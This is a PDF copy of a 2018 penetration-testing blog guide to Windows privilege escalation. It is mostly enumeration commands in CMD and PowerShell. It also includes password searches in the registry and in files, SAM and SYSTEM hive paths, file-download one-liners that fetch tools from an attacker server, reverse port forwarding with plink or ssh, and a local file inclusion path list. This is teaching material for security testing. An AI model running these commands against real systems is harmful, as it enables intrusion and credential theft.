Windows Privilege Escalation Guide
User Manual:
Open the PDF directly: View PDF .
Page Count: 14
Download | ![]() |
Open PDF In Browser | View PDF |
15/10/2018 Windows Privilege Escalation Guide Windows Privilege Escalation Guide Posted on January 26, 2018 Privilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need to know what to check and look for. This takes familiarity with systems that normally comes along with experience. At rst privilege escalation can seem like a daunting task, but after a while you start to lter through what is normal and what isn’t. It eventually becomes easier to know what to look for rather than digging through everything hoping to nd that needle in the haystack. Hopefully this guide will provide a good foundation to build upon and get you started. This guide is in uenced by g0tm1lk’s Basic Linux Privilege Escalation (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/), which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect. Note: I am not an expert and still learning myself. Guide Layout In each section I rst provide the old trusted CMD commands and then also a Powershell equivalent for posterity sake. It’s good to have both tools under your belt and Powershell is much more versatile for scripting than the traditional CMD. However there isn’t a Powershell equivalent for everything (or CMD is still simply easier/better on certain things), so some sections will only contain regular CMD commands. Version 1.2 - Last updated July 2018 Operating System What is the OS and architecture? Is it missing any patches? https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 1/14 15/10/2018 Windows Privilege Escalation Guide systeminfo wmic qfe Is there anything interesting in environment variables? A domain controller in LOGONSERVER ? set Get-ChildItem Env: | ft Key,Value Are there any other connected drives? net use wmic logicaldisk get caption,description,providername Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSyste Users Who are you? whoami echo %USERNAME% $env:UserName Any interesting user privileges? Note: The State column does not mean that the user does or does not have access to this privilege. If the privilege is listed, then that user has it. whoami /priv What users are on the system? Any old user pro les that weren’t cleaned up? https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 2/14 15/10/2018 Windows Privilege Escalation Guide net users dir /b /ad "C:\Users\" dir /b /ad "C:\Documents and Settings\" # Windows XP and below Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name Is anyone else logged in? qwinsta What groups are on the system? net localgroup Get-LocalGroup | ft Name Are any of the users in the Administrators group? net localgroup Administrators Get-LocalGroupMember Administrators | ft Name, PrincipalSource Anything in the Registry for User Autologon? reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nu Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win Anything interesting in Credential Manager? https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 3/14 15/10/2018 Windows Privilege Escalation Guide cmdkey /list dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentia Can we access SAM and SYSTEM les? %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system Programs, Processes, and Services What software is installed? dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" reg query HKEY_LOCAL_MACHINE\SOFTWARE Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name Are there any weak folder or le permissions? Full Permissions for Everyone or Users on Program Folders? https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 4/14 15/10/2018 Windows Privilege Escalation Guide icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\ Modify Permissions for Everyone or Users on Program Folders? icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { G Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { G You can also upload accesschk from Sysinternals to check for writeable folders and les. accesschk.exe -qwsu "Everyone" * accesschk.exe -qwsu "Authenticated Users" * accesschk.exe -qwsu "Users" * What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it? See Port Forwarding in Appendix. tasklist /svc tasklist /v net start sc query Get-Process has a -IncludeUserName option to see the process owner, however you have to have administrative rights to use it. https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 5/14 15/10/2018 Windows Privilege Escalation Guide Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Get-Service This one liner returns the process owner without admin rights, if something is blank under owner it’s probably running as SYSTEM, NETWORK SERVICE, or LOCAL SERVICE. Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlik Any weak service permissions? Can we recon gure anything? Again, upload accesschk. accesschk.exe -uwcqv "Everyone" * accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwcqv "Users" * Are there any unquoted service paths? wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Aut gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode What scheduled tasks are there? Anything custom implemented? schtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskNam What is ran at startup? https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 6/14 15/10/2018 Windows Privilege Escalation Guide wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" Get-CimInstance Win32_StartupCommand | select Name, command, Location, User Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Win Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Win Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Wind Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Wind Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" Is AlwaysInstallElevated enabled? I have not ran across this but it doesn’t hurt to check. reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInsta Networking What NICs are connected? Are there multiple networks? ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft What routes do we have? route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 7/14 15/10/2018 Windows Privilege Escalation Guide Anything in the ARP cache? arp -a Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress Are there connections to other hosts? netstat -ano Anything in the hosts le? C:\WINDOWS\System32\drivers\etc\hosts Is the rewall turned on? If so what’s con gured? netsh netsh netsh netsh firewall show state firewall show config advfirewall firewall show rule name=all advfirewall export "firewall.txt" Any other interesting interface con gurations? netsh dump Are there any SNMP con gurations? reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse Interesting Files and Sensitive Information https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 8/14 15/10/2018 Windows Privilege Escalation Guide This section may be a little noisy so you may want to output commands into txt les to review and parse as you wish. Any passwords in the registry? reg query HKCU /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s Are there sysprep or unattend les available that weren’t cleaned up? dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.tx Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -Error If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.con g les? dir /a C:\inetpub\ dir /s web.config C:\Windows\System32\inetsrv\config\applicationHost.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAc What’s in the IIS Logs? C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log Is XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP con guration les? dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 9/14 15/10/2018 Windows Privilege Escalation Guide Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini Any Apache web logs? dir /s access.log error.log Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -Error Any interesting les to look at? Possibly inside User directories (Desktop, Documents, etc)? dir /s *pass* == *vnc* == *.config* 2>nul Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Rec Files containing password inside them? findstr /si password *.xml *.ini *.txt *.config 2>nul Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorActio Appendix Enumeration Script I’ve created a Powershell script which pretty much automates all of the above. You can check it out here (https://github.com/absolomb/WindowsEnum). Transferring Files https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 10/14 15/10/2018 Windows Privilege Escalation Guide At some point during privilege escalation you will need to get les onto your target. Below are some easy ways to do so. Powershell Cmdlet (Powershell 3.0 and higher) Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\fil Powershell One-Liner (New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", Powershell Script echo echo echo echo $webclient = New-Object System.Net.WebClient >>wget.ps1 $url = "http://IPADDRESS/file.exe" >>wget.ps1 $file = "output-file.exe" >>wget.ps1 $webclient.DownloadFile($url,$file) >>wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile - Non-interactive FTP via text le. Useful for when you only have limited command execution. echo echo echo echo echo echo open 10.10.10.11 21> ftp.txt USER username>> ftp.txt mypassword>> ftp.txt bin>> ftp.txt GET filename>> ftp.txt bye>> ftp.txt ftp -v -n -s:ftp.txt CertUtil certutil.exe -urlcache -split -f https://myserver/filename outputfilename https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 11/14 15/10/2018 Windows Privilege Escalation Guide Port Forwarding This is useful for exposing inside services that aren’t available from outside the machine, normally due to rewall settings. Upload plink.exe to target. Start SSH on your attacking machine. For example to expose SMB, on the target run: plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS As of Windows 10 1803 (April 2018 Update), ssh client is now included and turned on by default! So you’re able use ssh to do port forwarding right out of the box now. ssh -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS Local File Inclusion List This is not an exhaustive list, installation directories will vary, I’ve only listed common ones. https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 12/14 15/10/2018 Windows Privilege Escalation Guide C:\Apache\conf\httpd.conf C:\Apache\logs\access.log C:\Apache\logs\error.log C:\Apache2\conf\httpd.conf C:\Apache2\logs\access.log C:\Apache2\logs\error.log C:\Apache22\conf\httpd.conf C:\Apache22\logs\access.log C:\Apache22\logs\error.log C:\Apache24\conf\httpd.conf C:\Apache24\logs\access.log C:\Apache24\logs\error.log C:\Documents and Settings\Administrator\NTUser.dat C:\php\php.ini C:\php4\php.ini C:\php5\php.ini C:\php7\php.ini C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf C:\Program Files (x86)\Apache Group\Apache\logs\access.log C:\Program Files (x86)\Apache Group\Apache\logs\error.log C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf C:\Program Files (x86)\Apache Group\Apache2\logs\access.log C:\Program Files (x86)\Apache Group\Apache2\logs\error.log c:\Program Files (x86)\php\php.ini" C:\Program Files\Apache Group\Apache\conf\httpd.conf C:\Program Files\Apache Group\Apache\conf\logs\access.log C:\Program Files\Apache Group\Apache\conf\logs\error.log C:\Program Files\Apache Group\Apache2\conf\httpd.conf C:\Program Files\Apache Group\Apache2\conf\logs\access.log C:\Program Files\Apache Group\Apache2\conf\logs\error.log C:\Program Files\FileZilla Server\FileZilla Server.xml C:\Program Files\MySQL\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.1\my.cnf C:\Program Files\MySQL\MySQL Server 5.1\my.ini C:\Program Files\MySQL\MySQL Server 5.5\my.cnf C:\Program Files\MySQL\MySQL Server 5.5\my.ini C:\Program Files\MySQL\MySQL Server 5.6\my.cnf C:\Program Files\MySQL\MySQL Server 5.6\my.ini C:\Program Files\MySQL\MySQL Server 5.7\my.cnf C:\Program Files\MySQL\MySQL Server 5.7\my.ini C:\Program Files\php\php.ini C:\Users\Administrator\NTUser.dat C:\Windows\debug\NetSetup.LOG C:\Windows\Panther\Unattend\Unattended.xml https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 13/14 15/10/2018 Windows Privilege Escalation Guide C:\Windows\Panther\Unattended.xml C:\Windows\php.ini C:\Windows\repair\SAM C:\Windows\repair\system C:\Windows\System32\config\AppEvent.evt C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\RegBack\system C:\Windows\System32\config\SAM C:\Windows\System32\config\SecEvent.evt C:\Windows\System32\config\SysEvent.evt C:\Windows\System32\config\SYSTEM C:\Windows\System32\drivers\etc\hosts C:\Windows\System32\winevt\Logs\Application.evtx C:\Windows\System32\winevt\Logs\Security.evtx C:\Windows\System32\winevt\Logs\System.evtx C:\Windows\win.ini C:\xampp\apache\conf\extra\httpd-xampp.conf C:\xampp\apache\conf\httpd.conf C:\xampp\apache\logs\access.log C:\xampp\apache\logs\error.log C:\xampp\FileZillaFTP\FileZilla Server.xml C:\xampp\MercuryMail\MERCURY.INI C:\xampp\mysql\bin\my.ini C:\xampp\php\php.ini C:\xampp\security\webdav.htpasswd C:\xampp\sendmail\sendmail.ini C:\xampp\tomcat\conf\server.xml Tags: guides ← PREVIOUS POST (/2018-01-23-UNDERTHEWIRE-CYBORG/) NEXT POST → (/2018-02-24-HACKTHEBOX-MANTIS-WRITEUP/) (https://github.com/absolomb) (mailto:YmxvZ0BhYnNvbG9tYi5jb20=) Ryan McFarland • 2018 Theme by beautiful-jekyll (http://deanattali.com/beautiful-jekyll/) https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ 14/14
Source Exif Data:
File Type : PDF File Type Extension : pdf MIME Type : application/pdf PDF Version : 1.4 Linearized : No Page Count : 14 Creator : Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Producer : Skia/PDF m69 Create Date : 2018:10:15 10:27:51+00:00 Modify Date : 2018:10:15 10:27:51+00:00EXIF Metadata provided by EXIF.tools